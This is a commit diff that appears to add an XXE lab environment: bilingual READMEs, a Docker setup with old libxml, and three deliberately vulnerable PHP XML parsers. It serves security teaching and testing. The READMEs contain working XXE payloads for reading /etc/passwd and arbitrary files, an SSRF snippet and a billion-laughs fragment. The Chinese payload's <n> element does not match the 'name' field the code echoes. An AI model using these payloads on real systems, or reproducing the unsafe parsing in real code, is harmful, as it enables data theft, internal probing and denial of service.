first commit

php/php_xxe/README.md

@@ -0,0 +1,76 @@
+# PHP XML External Entity Injection (XXE)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+XML External Entity (XXE) Injection is a vulnerability that occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This vulnerability can lead to various attacks including disclosure of confidential data, denial of service, server side request forgery, port scanning, and other system impacts.
+
+After libxml 2.9.0, external entity parsing is disabled by default, which largely mitigated XXE vulnerabilities. This environment uses libxml 2.8.0 compiled into PHP to demonstrate XXE vulnerabilities in PHP applications.
+
+References:
+
+- [OWASP XXE Prevention Cheat Sheet](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)
+- [PHP Documentation: libxml](https://www.php.net/manual/en/book.libxml.php)
+- [CWE-611: Improper Restriction of XML External Entity Reference](https://cwe.mitre.org/data/definitions/611.html)
+
+## Environment Setup
+
+This environment is based on the PHP 7.0.30 with libxml 2.8.0, execute the following command to start the environment:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080/index.php` to see the phpinfo page. You can verify the libxml version (2.8.0) by searching for "libxml" on that page.
+
+The web root directory `./www` contains three vulnerable PHP files demonstrating different XML parsing methods:
+
+```bash
+$ tree .
+.
+├── dom.php               # Example: XML parsing using DOMDocument
+├── index.php
+├── SimpleXMLElement.php  # Example: XML parsing using SimpleXMLElement class
+└── simplexml_load_string.php  # Example: XML parsing using simplexml_load_string function
+```
+
+All three files (`dom.php`, `SimpleXMLElement.php`, and `simplexml_load_string.php`) are vulnerable to XXE attacks.
+
+## Vulnerability Reproduction
+
+Send the following XML payload to any of the vulnerable files to read the contents of `/etc/passwd`:
+
+```xml
+<?xml version="1.0" encoding="utf-8"?> 
+<!DOCTYPE xxe [
+<!ELEMENT name ANY >
+<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<root>
+<name>&xxe;</name>
+</root>
+```
+
+The successful exploitation will display the contents of the file:
+
+![](1.png)
+
+### Advanced Exploitation Techniques
+
+Reading Arbitrary Files:
+
+```xml
+<!ENTITY xxe SYSTEM "file:///path/to/sensitive/file" >
+```
+
+SSRF (Server-Side Request Forgery):
+
+```xml
+<!ENTITY xxe SYSTEM "http://internal.service.local" >
+```
+
+Denial of Service (Billion Laughs Attack):
+
+```xml
+<!ENTITY lol "lol">
+<!ENTITY lol2 "&lol;&lol;">
+<!ENTITY lol3 "&lol2;&lol2;">
+```

php/php_xxe/README.zh-cn.md

@@ -0,0 +1,74 @@
+# PHP XML 外部实体注入漏洞（XXE）
+
+XML 外部实体注入（XXE）是一种发生在应用程序解析 XML 输入时的安全漏洞。当 XML 解析器配置不当，处理包含对外部实体引用的 XML 输入时，可能导致敏感信息泄露、拒绝服务、服务器端请求伪造、端口扫描等多种攻击。
+
+在 libxml 2.9.0 版本之后，默认禁用了外部实体解析，这在很大程度上缓解了 XXE 漏洞。本环境使用 libxml 2.8.0 版本编译进 PHP 中，以演示 PHP 应用中的 XXE 漏洞。PHP 版本本身并不影响 XXE 漏洞的利用。
+
+参考链接：
+
+- [OWASP XXE Prevention Cheat Sheet](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)
+- [PHP Documentation: libxml](https://www.php.net/manual/en/book.libxml.php)
+- [CWE-611: Improper Restriction of XML External Entity Reference](https://cwe.mitre.org/data/definitions/611.html)
+
+## 环境搭建
+
+执行如下命令启动一个基于 PHP 7.0.30 和 libxml 2.8.0 的漏洞服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080/index.php` 可以看到 phpinfo 页面。在页面中搜索 "libxml" 可以验证其版本为 2.8.0。
+
+Web 根目录 `./www` 包含以下文件：
+
+```bash
+$ tree .
+.
+├── dom.php               # 示例：使用 DOMDocument 解析 XML
+├── index.php
+├── SimpleXMLElement.php  # 示例：使用 SimpleXMLElement 类解析 XML
+└── simplexml_load_string.php  # 示例：使用 simplexml_load_string 函数解析 XML
+```
+
+这三个文件（`dom.php`、`SimpleXMLElement.php` 和 `simplexml_load_string.php`）都存在 XXE 漏洞。每个文件演示了一种可被利用的 PHP XML 解析方法。
+
+## 漏洞复现
+
+向上述3个文件发送以下 payload 即可读取 `/etc/passwd` 文件内容：
+
+```xml
+<?xml version="1.0" encoding="utf-8"?> 
+<!DOCTYPE xxe [
+<!ELEMENT name ANY >
+<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<root>
+<n>&xxe;</n>
+</root>
+```
+
+执行结果示例：
+
+![](1.png)
+
+### 高级利用技巧
+
+文件内容读取：
+
+```xml
+<!ENTITY xxe SYSTEM "file:///path/to/sensitive/file" >
+```
+
+SSRF（服务器端请求伪造）：
+
+```xml
+<!ENTITY xxe SYSTEM "http://internal.service.local" >
+```
+
+拒绝服务攻击（Billion Laughs Attack）：
+
+```xml
+<!ENTITY lol "lol">
+<!ENTITY lol2 "&lol;&lol;">
+<!ENTITY lol3 "&lol2;&lol2;">
+```

php/php_xxe/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+ web:
+   image: vulhub/php:7.0.30
+   volumes:
+    - ./www:/var/www/html
+   ports:
+    - "8080:80"

php/php_xxe/www/SimpleXMLElement.php

@@ -0,0 +1,5 @@
+<?php
+$data = file_get_contents('php://input');
+$xml = new SimpleXMLElement($data);
+
+echo $xml->name;

php/php_xxe/www/dom.php

@@ -0,0 +1,7 @@
+<?php
+$data = file_get_contents('php://input');
+
+$dom = new DOMDocument();
+$dom->loadXML($data);
+
+print_r($dom);

php/php_xxe/www/index.php

@@ -0,0 +1,2 @@
+<?php
+phpinfo();

php/php_xxe/www/simplexml_load_string.php

@@ -0,0 +1,5 @@
+<?php
+$data = file_get_contents('php://input');
+$xml = simplexml_load_string($data);
+
+echo $xml->name;